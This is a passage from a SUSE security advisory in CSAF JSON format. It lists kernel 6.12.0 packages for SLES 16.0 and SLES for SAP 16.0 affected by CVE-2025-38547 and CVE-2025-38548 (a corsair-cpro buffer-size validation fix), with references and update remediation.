"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "low"
}
],
"title": "CVE-2025-38547"
},
{
"cve": "CVE-2025-38548",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38548"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (corsair-cpro) Validate the size of the received input buffer\n\nAdd buffer_recv_size to store the size of the received bytes.\nValidate buffer_recv_size in send_usb_cmd().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38548",
"url": "https://www.suse.com/security/cve/CVE-2025-38548"
},
{
"category": "external",
"summary": "SUSE Bug 1248228 for CVE-2025-38548",
"url": "https://bugzilla.suse.com/1248228"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
